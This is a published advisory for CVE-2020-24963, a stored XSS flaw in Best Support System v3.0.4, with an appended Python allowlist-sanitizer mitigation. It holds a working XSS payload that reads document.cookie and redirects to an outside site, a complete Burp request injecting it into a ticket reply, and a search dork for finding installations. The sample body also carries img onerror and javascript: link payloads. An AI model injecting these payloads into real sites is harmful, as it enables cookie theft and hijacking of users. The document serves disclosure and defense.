Best Support System v3.0.4 - Authenticated Persistent XSS

2020.09.05
Ex.Mi (RU)
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 3.5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

[+] :: Exploit Title: Best Support System v3.0.4 - Authenticated Persistent XSS
[+] :: Google Dork: "Powered By Best Support System"
[+] :: Date: 2020-08-23
[+] :: Exploit Author: Ex.Mi [ https://ex-mi.ru ]
[+] :: Vendor: Appsbd [ https://appsbd.com ]
[+] :: Software Version: 3.0.4
[+] :: Software Link: https://codecanyon.net/item/best-support-systemclient-support-desk-help-centre/21357317
[+] :: Tested on: Kali Linux
[+] :: CVE: CVE-2020-24963
[+] :: CWE: CWE-79

[i] :: Info:

An Authenticated Persistent XSS vulnerability was discovered in the Best Support System, tested version — v3.0.4.

[$] :: Payload:

13"-->">'` -- `<!--<img src="--><img src=x onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);location=`https://ex-mi.ru`;>

[!] :: PoC (Burp Suite POST request):

POST /support-system/ticket-confirm/ticket-reply/11.html HTTP/1.1
Host: demo.appsbd.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 350
Origin: https://demo.appsbd.com
Connection: close
Referer: https://demo.appsbd.com/support-system/ticket/details/11.html
Cookie: [cookies_here]

app_form=8d1c319d5826a789b3ca3e71516b0c5c&ticket_body=%3Cp%3E%3Cbr%3E%3C%2Fp%3E13%22--%26gt%3B%22%26gt%3B'%60+--+%60%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3D%22x%22+onerror%3D%22(alert)(%60Ex_Mi%60)%3B(alert)(document.cookie)%3Blocation%3D%60https%3A%2F%2Fex-mi.ru%60%3B%22%3E&status=&app_form_ajax=ad1ce2b2c3eb943efaa8c239ff53acc2

[+] :: Contacts:

Website: ex-mi.ru
Telegram: @ex_mi
GitHub: @ex-mi
Medium: @ex.mi
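
Mitigation for the stored-XSS class reported above, as an added example that is not part of the advisory or the vendor's code: allowlist sanitization of a rich-text field such as ticket_body before it is stored or rendered, written in Python for illustration. The tag allowlist, the function names and the sample request body are assumptions.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Assumed policy for a support-ticket editor; not the vendor's actual allowlist.
ALLOWED_TAGS = {"p", "br", "b", "i", "strong", "em", "ul", "ol", "li", "a"}
VOID_TAGS = {"br"}
SAFE_SCHEMES = {"http", "https", "mailto"}

def safe_href(href):  # accept only absolute links with an allowlisted scheme
    try:
        return urlsplit(href.strip()).scheme.lower() in SAFE_SCHEMES
    except ValueError:  # malformed URL
        return False

class AllowlistSanitizer(HTMLParser):
    """Rebuilds markup from parsed tokens; comments and unlisted tags are dropped."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # e.g. <img>, <script>, <svg>, together with every attribute
        link = ""  # href is the only attribute ever re-emitted; on* handlers never are
        if tag == "a" and safe_href(dict(attrs).get("href") or ""):
            link = ' href="%s"' % escape(dict(attrs)["href"], quote=True)
        self.out.append(f"<{tag}{link}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data, quote=True))  # text is always re-encoded

def sanitize_ticket_body(raw_html):
    parser = AllowlistSanitizer()
    parser.feed(raw_html)
    parser.close()
    return "".join(parser.out)

def sanitize_form_field(urlencoded_body, field="ticket_body"):
    # Decode an application/x-www-form-urlencoded body and sanitize one field.
    values = parse_qs(urlencoded_body, keep_blank_values=True)
    return sanitize_ticket_body(values.get(field, [""])[0])

# Constructed sample body (not the request from the advisory).
SAMPLE = ("ticket_body=%3Cp%3EHi%3C%2Fp%3E%3Cimg+src%3D%22x%22+onerror%3D%22alert(1)%22%3E"
          "%3Ca+href%3D%22javascript%3Aalert(1)%22%3Eclick%3C%2Fa%3E&status=")
```

Sanitizing on input does not replace context-aware output encoding when the stored reply is rendered into the ticket page.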

References:

https://codecanyon.net/item/best-support-systemclient-support-desk-help-centre/21357317
https://medium.com/@ex.mi/php-best-support-system-v3-0-4-authenticated-persistent-xss-dfe6d4a06f75
https://ex-mi.ru/exploit/[2020-08-23]-[PHP]-best-support-system-v3.0.4.txt
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24963
https://www.youtube.com/watch?v=Lz0-WWbw2Sw



Copyright 2020, cxsecurity.com

 
